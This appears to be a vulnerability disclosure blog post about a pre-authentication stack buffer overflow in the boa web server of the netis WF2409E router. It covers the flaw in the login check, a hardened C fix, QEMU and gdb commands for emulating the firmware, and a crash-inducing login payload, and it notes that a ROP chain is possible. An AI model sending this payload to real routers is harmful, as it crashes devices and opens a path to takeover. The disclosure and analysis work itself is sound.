Buffer Overflow in boa of netis_WF2409E


Principle of Vulnerability

During my internship at Qi An Xin Tiangong Lab, I found a stack-based buffer overflow in the boa web server shipped on the netis WF2409E router.

sub_4110d4 implements the login check. It formats the submitted username and passwd into the stack buffer v5 with sprintf and then compares the result against sys_passwd. sprintf never checks the size of its destination, so oversized username or passwd values run past the end of v5 and overwrite the rest of the stack frame. Because this happens while the credentials are still being checked, the bug is reachable without valid credentials: it is a pre-authentication overflow.
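The following C is an added illustration, not code from the post or from the router firmware. It reconstructs the vulnerable pattern described above (sprintf of username and passwd into a fixed stack buffer, then a comparison against sys_passwd) next to a hardened version that refuses input that does not fit, and it builds a PoC body of the same shape as the one used later in the post. The buffer size V5_LEN, the function names, and the 57/41 repetition counts are assumptions for the demo; the real size of v5 is not stated in the post.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the stack buffer v5 in sub_4110d4. The real size is not
 * given in the post; 64 is a placeholder chosen for the demo. */
#define V5_LEN 64

/* Reconstruction of the vulnerable pattern: sprintf concatenates the two
 * parameters into v5 with no bound. Only ever call this with inputs that are
 * known to fit, otherwise the stack frame is smashed (that is the bug). */
int auth_vulnerable(const char *username, const char *passwd, const char *sys_passwd)
{
    char v5[V5_LEN];
    sprintf(v5, "%s%s", username, passwd);      /* unbounded write */
    return strcmp(v5, sys_passwd) == 0;
}

/* Hardened version: reject input that cannot fit (including the NUL) before
 * touching v5, then use snprintf and check its return value as a second line
 * of defence against truncation. */
int auth_hardened(const char *username, const char *passwd, const char *sys_passwd)
{
    char v5[V5_LEN];
    size_t need = strlen(username) + strlen(passwd) + 1;   /* +1 for NUL */
    if (need > sizeof v5)
        return 0;                                /* oversized: deny */
    int n = snprintf(v5, sizeof v5, "%s%s", username, passwd);
    if (n < 0 || (size_t)n >= sizeof v5)
        return 0;                                /* error or truncated: deny */
    return strcmp(v5, sys_passwd) == 0;
}

/* Would this username/passwd pair overflow the assumed V5_LEN buffer? */
int would_overflow(const char *username, const char *passwd)
{
    return strlen(username) + strlen(passwd) + 1 > V5_LEN;
}

/* Build a form body of the same shape as the post's PoC:
 * "username=" + user_n copies of '1' + "&passwd=" + pass_n copies of '1'.
 * Returns the body length, or -1 if out is too small. */
int build_poc_body(size_t user_n, size_t pass_n, char *out, size_t out_len)
{
    const char *k_user = "username=", *k_pass = "&passwd=";
    size_t need = strlen(k_user) + user_n + strlen(k_pass) + pass_n + 1;
    if (out == NULL || need > out_len)
        return -1;
    char *p = out;
    memcpy(p, k_user, strlen(k_user)); p += strlen(k_user);
    memset(p, '1', user_n);            p += user_n;
    memcpy(p, k_pass, strlen(k_pass)); p += strlen(k_pass);
    memset(p, '1', pass_n);            p += pass_n;
    *p = '\0';
    return (int)(p - out);
}

/* Scratch buffer for the PoC body (constructed sample data, not a capture). */
char g_body[256];

int main(void)
{
    /* Same shape as the post's PoC: long runs of '1' in both fields. */
    char user[128], pass[128];
    memset(user, '1', 57); user[57] = '\0';
    memset(pass, '1', 41); pass[41] = '\0';

    int len = build_poc_body(57, 41, g_body, sizeof g_body);
    printf("PoC body (%d bytes): %s\n", len, g_body);
    printf("overflows a %d-byte v5: %s\n", V5_LEN, would_overflow(user, pass) ? "yes" : "no");
    printf("hardened check rejects it: %s\n", auth_hardened(user, pass, "admin") ? "no" : "yes");
    printf("legitimate login through hardened check: %s\n",
           auth_hardened("admin", "admin", "adminadmin") ? "ok" : "denied");
    return 0;
}
```

The length check in auth_hardened is what the firmware is missing: with a bound on the concatenated length, the same two parameters are simply rejected instead of overwriting the saved registers of sub_4110d4.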


Simulation with QEMU

Start the web service by running boa under qemu-mips-static inside a chroot of the extracted firmware root (the -L prefix points the emulated loader at the firmware's own lib directory):

sudo chroot ./ ./qemu-mips-static -L ./lib ./bin/boa -p /web -f /etc/boa.conf


PoC

Submit the following login parameters, with long runs of characters in both fields:

username=1111111111111111111111111111111111111111111111111111111&passwd=11111111111111111111111111111111111111111

The web service crashes outright.


Debugging with gdb

Restart boa with the -g option so that QEMU waits for a gdb connection on port 1234 before executing the first instruction, then attach a MIPS-capable gdb with target remote and send the same request:

sudo chroot ./ ./qemu-mips-static -L ./lib -g 1234 ./bin/boa -p /web -f /etc/boa.conf


The gdb session shows that the overflow has overwritten the saved return address of sub_4110d4, so the program counter is now attacker-controlled. With a longer payload the same overflow can carry a ROP chain built from gadgets in boa or its libraries.


https://lafdrew.github.io/2025/04/25/Buffer-Overflow-in-boa-of-netis-WF2409E/
Author
John Doe
Posted on
April 25, 2025